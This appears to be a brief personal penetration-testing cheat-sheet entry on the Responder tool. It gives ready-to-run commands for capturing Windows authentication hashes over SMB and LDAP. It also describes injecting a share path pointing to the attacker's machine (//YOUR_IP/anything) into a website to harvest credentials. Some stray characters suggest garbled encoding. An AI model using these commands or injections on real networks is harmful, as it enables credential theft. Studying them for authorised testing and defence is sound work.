Responder
You can use responder (5.0k β) to catch Windows authentication requests allowing us to grab hashes and passwords.
For instance, a website may be using SMB to access some shares based on the user input. If we inject a share leading to our machine, we may be able to grab the credentials used to connect to the share.
$ sudo responder -I tun0
$ sudo responder -i IP -I tun0
Logs are stored at: /usr/share/responder/logs
.
Following the previous example, if we inject //YOUR_IP/anything
. If the website was configured to use the current user credentials to connect to the share, then you will receive them, and will have to crack them.
π It works with SMB, LDAP, etc.
π» To-do π»
Stuff that I found, but never read/used yet.
Passive Network Discovery
$ sudo responder -I tun0 -A
$ sudo responder -I tun0 -wdF -b
$ sqlitebrowser /usr/share/responder/Responder.db
$ rm -rf /usr/share/responder/Responder.db